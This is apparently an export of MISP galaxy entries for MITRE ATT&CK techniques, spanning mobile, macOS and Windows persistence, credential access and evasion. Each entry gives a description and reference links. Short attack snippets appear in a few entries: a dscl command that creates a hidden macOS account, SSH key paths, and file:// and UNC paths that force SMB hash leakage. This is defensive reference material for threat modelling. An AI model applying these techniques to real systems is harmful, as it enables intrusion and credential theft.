Malicious applications may also abuse the startForeground() API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)

The tag is: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541"

Table 6267. Table References

Links

https://attack.mitre.org/techniques/T1541

https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/

https://developer.android.com/guide/components/services.html#Foreground

https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices

https://i.blackhat.com/eu-19/Thursday/eu-19-Sutter-Simple-Spyware-Androids-Invisible-Foreground-Services-And-How-To-Abuse-Them.pdf

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html

Private Keys - T1145

Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)

Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows.

Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.

Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)

The tag is: misp-galaxy:mitre-attack-pattern="Private Keys - T1145"

Table 6268. Table References

Links

https://attack.mitre.org/techniques/T1145

https://en.wikipedia.org/wiki/Public-key_cryptography

https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf

https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

Lockscreen Bypass - T1461

An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen. Several methods exist to accomplish this, including:

  • Biometric spoofing: If biometric authentication is used, an adversary could attempt to spoof a mobile device’s biometric authentication mechanism. Both iOS and Android partly mitigate this attack by requiring the device’s passcode rather than biometrics to unlock the device after every device restart, and after a set or random amount of time.(Citation: SRLabs-Fingerprint)(Citation: TheSun-FaceID)

  • Unlock code bypass: An adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (“shoulder surfing”) the device owner’s use of the lockscreen passcode. Mobile OS vendors partly mitigate this by implementing incremental backoff timers after a set number of failed unlock attempts, as well as a configurable full device wipe after several failed unlock attempts.

  • Vulnerability exploit: Techniques have been periodically demonstrated that exploit mobile devices to bypass the lockscreen. The vulnerabilities are generally patched by the device or OS vendor once disclosed.(Citation: Wired-AndroidBypass)(Citation: Kaspersky-iOSBypass)

The tag is: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461"

Table 6269. Table References

Links

https://attack.mitre.org/techniques/T1461

https://srlabs.de/bites/spoofing-fingerprints/

https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/

https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/

https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/

Data Manipulation - T1641

Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application, process, and the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1641"

Table 6270. Table References

Links

https://attack.mitre.org/techniques/T1641

URI Hijacking - T1416

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If a malicious application were to register for a URI that was already in use by a genuine application, the malicious application may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the malicious application to gain access to resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)

The tag is: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416"

Table 6271. Table References

Links

https://attack.mitre.org/techniques/T1416

https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/

https://tools.ietf.org/html/rfc7636

Input Capture - T1417

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal device usage, users often provide credentials to various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Keylogging](https://attack.mitre.org/techniques/T1417/001)) or rely on deceiving the user into providing input into what they believe to be a genuine application prompt (e.g. [GUI Input Capture](https://attack.mitre.org/techniques/T1417/002)).

The tag is: misp-galaxy:mitre-attack-pattern="Input Capture - T1417"

Table 6272. Table References

Links

https://attack.mitre.org/techniques/T1417

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html

Hidden Users - T1147

Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: <code>sudo dscl . -create /Users/username UniqueID 401</code> (Citation: Cybereason OSX Pirrit).

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147"

Table 6273. Table References

Links

https://attack.mitre.org/techniques/T1147

https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

Software Discovery - T1418

Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempts specific actions.

Adversaries may attempt to enumerate applications for a variety of reasons, such as figuring out what security measures are present or to identify the presence of target applications.

The tag is: misp-galaxy:mitre-attack-pattern="Software Discovery - T1418"

Table 6274. Table References

Links

https://attack.mitre.org/techniques/T1418

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html

SSH Hijacking - T1184

Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)

[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184"

Table 6275. Table References

Links

https://attack.mitre.org/techniques/T1184

https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf

https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking

https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Web Service - T1481

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Web Service - T1481"

Table 6276. Table References

Links

https://attack.mitre.org/techniques/T1481

LC_MAIN Hijacking - T1149

This technique has been deprecated and should no longer be used.

As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.

The tag is: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149"

Table 6277. Table References

Links

https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf

https://attack.mitre.org/techniques/T1149

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Disk Wipe - T1561

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as erase.(Citation: erase_cmd_cisco)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Wipe - T1561"

Table 6278. Table References

Links

https://attack.mitre.org/techniques/T1561

https://docs.microsoft.com/sysinternals/downloads/sysmon

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463

Input Injection - T1516

A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android’s accessibility APIs.

[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of the following methods:

  • Mimicking user clicks on the screen, for example to steal money from a user’s PayPal account.(Citation: android-trojan-steals-paypal-2fa)

  • Injecting global actions, such as GLOBAL_ACTION_BACK (programatically mimicking a physical back button press), to trigger actions on behalf of the user.(Citation: Talos Gustuff Apr 2019)

  • Inserting input into text fields on behalf of the user. This method is used legitimately to auto-fill text fields by applications such as password managers.(Citation: bitwarden autofill logins)

The tag is: misp-galaxy:mitre-attack-pattern="Input Injection - T1516"

Table 6279. Table References

Links

https://attack.mitre.org/techniques/T1516

https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

https://help.bitwarden.com/article/auto-fill-android/

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Startup Items - T1165

Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.

The tag is: misp-galaxy:mitre-attack-pattern="Startup Items - T1165"

Table 6280. Table References

Links

https://attack.mitre.org/techniques/T1165

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Access Notifications - T1517

Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517"

Table 6281. Table References

Links

https://attack.mitre.org/techniques/T1517

https://www.welivesecurity.com/2019/06/17/malware-google-permissions-2fa-bypass/

Dylib Hijacking - T1157

macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.

A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)

If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.

The tag is: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157"

Table 6282. Table References

Links

https://attack.mitre.org/techniques/T1157

https://capec.mitre.org/data/definitions/471.html

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Software Discovery - T1518

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

The tag is: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518"

Table 6283. Table References

Links

https://attack.mitre.org/techniques/T1518

Launch Agent - T1159

Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).

Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).

The tag is: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159"

Table 6284. Table References

Links

https://attack.mitre.org/techniques/T1159

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Application Versioning - T1661

An adversary may push an update to a previously benign application to add malicious code. This can be accomplished by pushing an initially benign, functional application to a trusted application store, such as the Google Play Store or the Apple App Store. This allows the adversary to establish a trusted userbase that may grant permissions to the application prior to the introduction of malicious code. Then, an application update could be pushed to introduce malicious code.(Citation: android_app_breaking_bad)

This technique could also be accomplished by compromising a developer’s account. This would allow an adversary to take advantage of an existing userbase without having to establish the userbase themselves.

The tag is: misp-galaxy:mitre-attack-pattern="Application Versioning - T1661"

Table 6285. Table References

Links

https://attack.mitre.org/techniques/T1661

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html

https://www.welivesecurity.com/2023/05/23/android-app-breaking-bad-legitimate-screen-recording-file-exfiltration/

Call Control - T1616

Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.

Several permissions may be used to programmatically control phone calls, including:

  • ANSWER_PHONE_CALLS - Allows the application to answer incoming phone calls(Citation: Android Permissions)

  • CALL_PHONE - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions)

  • PROCESS_OUTGOING_CALLS - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions)

  • MANAGE_OWN_CALLS - Allows a calling application which manages its own calls through the self-managed ConnectionService APIs(Citation: Android Permissions)

  • BIND_TELECOM_CONNECTION_SERVICE - Required permission when using a ConnectionService(Citation: Android Permissions)

  • WRITE_CALL_LOG - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions)

When granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using Intent.ACTION_DIAL, which requires no specific permissions. This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.

The tag is: misp-galaxy:mitre-attack-pattern="Call Control - T1616"

Table 6286. Table References

Links

https://attack.mitre.org/techniques/T1616

https://developer.android.com/reference/android/Manifest.permission

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html

Browser Extensions - T1176

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser’s app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension’s update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.

Previous to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles, however <code>.mobileconfig</code> files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)

Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176"

Table 6287. Table References

Links

https://attack.mitre.org/techniques/T1176

https://developer.chrome.com/extensions

https://en.wikipedia.org/wiki/Browser_extension

https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/

https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)

https://kjaer.io/extension-malware/

https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf

https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/

https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses

https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/

https://www.xorrior.com/No-Place-Like-Chrome/

Securityd Memory - T1167

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)

If an adversary can obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)

The tag is: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1167"

Table 6288. Table References

Links

http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1167

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Process Doppelgänging - T1186

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)

Adversaries may leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)

Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):

  • Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.

  • Load – Create a shared section of memory and load the malicious executable.

  • Rollback – Undo changes to original executable, effectively removing malicious code from the file system.

  • Animate – Create a process from the tainted section of memory and initiate execution.

The tag is: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1186"

Table 6289. Table References

Links

https://attack.mitre.org/techniques/T1186

https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/

https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx

https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx

https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx

https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx

https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf

User Evasion - T1618

Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.

While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.

The tag is: misp-galaxy:mitre-attack-pattern="User Evasion - T1618"

Table 6290. Table References

Links

https://attack.mitre.org/techniques/T1618

LSASS Driver - T1177

The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)

Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177"

Table 6291. Table References

Links

https://attack.mitre.org/techniques/T1177

https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://technet.microsoft.com/library/cc961760.aspx

https://technet.microsoft.com/library/dn408187.aspx

Forced Authentication - T1187

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user’s system accesses the untrusted resource it will attempt authentication and send information, including the user’s hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)

There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)

  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\\[remote address]\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187"

Table 6292. Table References

Links

https://attack.mitre.org/techniques/T1187

https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/

https://en.wikipedia.org/wiki/Server_Message_Block

https://github.com/hob0/hashjacking

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf

https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx

https://www.us-cert.gov/ncas/alerts/TA17-293A

BITS Jobs - T1197

Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)

The tag is: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"

Table 6293. Table References

Links

https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/

https://attack.mitre.org/techniques/T1197

